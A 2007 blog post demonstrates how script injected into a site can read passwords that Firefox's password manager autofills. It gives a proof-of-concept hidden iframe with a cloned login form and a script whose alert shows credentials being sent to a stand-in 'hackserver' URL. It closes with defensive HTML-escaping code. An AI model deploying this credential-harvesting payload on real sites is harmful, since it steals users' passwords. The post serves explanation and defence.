Demonstrating the Password Manager Almost-Vulnerability in Firefox

Jul 28, 2007 javascript security

The “security guys” have been talking about the problems with Firefox’s password manager and I got curious. It turns out that JavaScript can read saved passwords out of your password manager simply by creating a login form on the same site and capturing the input fields’ contents once Firefox has filled them in.

While this isn’t necessarily a vulnerability in Firefox, it does suck! The biggest attack vector is websites that accept user-submitted content and have a script-injection (XSS) hole. Basically, if a third party can create a form and insert some JavaScript on the page, they are ‘acting’, as far as the browser is concerned, as a legitimate part of the site, and the password manager will treat their form like the real login form. Let’s check out a proof of concept:

First off, we have legitimate site here with its login form:

index.php
<h1>Log In:</h1>

<form action="login.php" name="login" method="post">
  Username: <input type="text" name="username"><br>
  Password: <input type="password" name="password"><br>
  <input type="submit">
</form>

And then we process the login (the form submission is what prompts Firefox to offer to save the password; this stub doesn’t check the credentials at all) and redirect to a standard page.

login.php
<?php
/**
 * yay logged in
 *
 * No credential check here on purpose: the point is only that a POST to
 * login.php happened, so Firefox offers to save what was typed.
 */
header("Location: loggedin.php");
exit;

and my logged in page.

loggedin.php
You're logged in now.

<a href="index.php">Log in again</a><br>
<a href="hack.php">Hack it</a>

As you can see, we can go back to the index.php page with the login form to verify that the password manager has saved our password: Firefox should prefill both fields.

Let’s move on to hack.php, which plays the part of the page with the injection hole: everything after the first line is what the third party managed to insert.

hack.php
Here is a normal page.  Don't feel scared.

<iframe src="iframe.php" style="visibility: hidden"></iframe>

In theory, you’d also have to have a file named iframe.php on the same server. I only split it out to keep the code separate. What matters is that the iframe is loaded from the same site the password was saved for; a frame served from some other domain would not be filled with this site’s credentials. In a real-life example the attacker doesn’t get to put a file on the server anyway: the content of iframe.php would be inserted directly into the vulnerable page, inside a div, so it runs as part of that page. But anyways…

The evil code:

iframe.php
<html>
  <body onload="stealit()">
    <form action="login.php" name="login" method="post">
      Username: <input type="text" name="username"><br>
      Password: <input type="password" name="password"><br>
    </form>
    <script>
      function stealit()
      {
        // Firefox fills the saved login while the page loads, so by onload
        // the values are readable like those of any other form field.
        var username=document.login.username.value;
        var password=document.login.password.value;

         alert(
           "I am gonna do this:  self.location.href='http://hackserver.php?username="
           + username + "&password=" + password + "'"
         );
      }
    </script>
  </body>
</html>

As you can see, this is a copy of the real login form (same action, same field names, served from the same site), so Firefox fills it in (Firefox is doing its job! Don’t be tooo mad). My script could then send the username and password to a remote server: by loading an image with the values in its URL, by changing the page location, or with anything else that makes a request. (A cross-site XMLHttpRequest would be stopped by the same-origin policy, but an image request or a redirect is not.) Here I just alert it.

While I’m excited to see what Firefox is going to do to help stop this type of issue, I’m not mad and don’t really think it's that much of a bug. When you use the password manager, you KNOW what it's going to do.
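The attack vector named at the top of the post is a script-injection hole in user-submitted content; the browser only fills a form that the site itself served. The root fix is therefore on the site, not in Firefox: escape user content on output so the injected iframe/form markup is rendered as text. The following is an added example, not code from the original post, in plain Node.js JavaScript. It contrasts the vulnerable string-concatenation render with an escaped one, using the hack.php payload from above as a constructed test input; `escapeHtml`, `renderCommentUnsafe`, `renderCommentSafe`, `containsTag` and `demo` are names chosen here for illustration.

```javascript
// Added example (not from the original post): the injected markup in
// hack.php gets onto the page because user-submitted content was written
// into the HTML unescaped. Compare an unsafe render with an escaped one.

// Constructed payload: the same hidden iframe hack.php carries in the post.
// iframe.php is the post's own placeholder file name, not a real server.
const INJECTED_COMMENT =
  "Here is a normal page.  Don't feel scared.\n" +
  '<iframe src="iframe.php" style="visibility: hidden"></iframe>';

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value. Everything else can stay as it is.
function escapeHtml(text) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The vulnerable pattern: raw concatenation of user content into markup,
// which is how a "comment" becomes a live <iframe> (or <form> + <script>).
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// The fix: escape at the point where untrusted text meets HTML.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Check used below: does the rendered HTML still contain a real start tag
// with this name? Escaped content shows up as "&lt;iframe" and is inert.
function containsTag(html, tagName) {
  return new RegExp('<' + tagName + '\\b', 'i').test(html);
}

// Render the constructed payload both ways and report what survived.
function demo() {
  const unsafe = renderCommentUnsafe(INJECTED_COMMENT);
  const safe = renderCommentSafe(INJECTED_COMMENT);
  return {
    unsafeHasIframe: containsTag(unsafe, 'iframe'), // true: attacker wins
    safeHasIframe: containsTag(safe, 'iframe'),     // false: rendered as text
    safe,
  };
}

const result = demo();
console.log('unsafe render contains <iframe>:', result.unsafeHasIframe);
console.log('escaped render contains <iframe>:', result.safeHasIframe);
console.log(result.safe);
```

Escaping on output is the one change that removes the whole class of attack in the post: with no way to get a form and a script into the page, there is nothing for the password manager to fill. The same goes for server-side templating (PHP's htmlspecialchars does the same job as escapeHtml here); the rule is that user text is escaped at the moment it is written into HTML, not on the way into the database.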
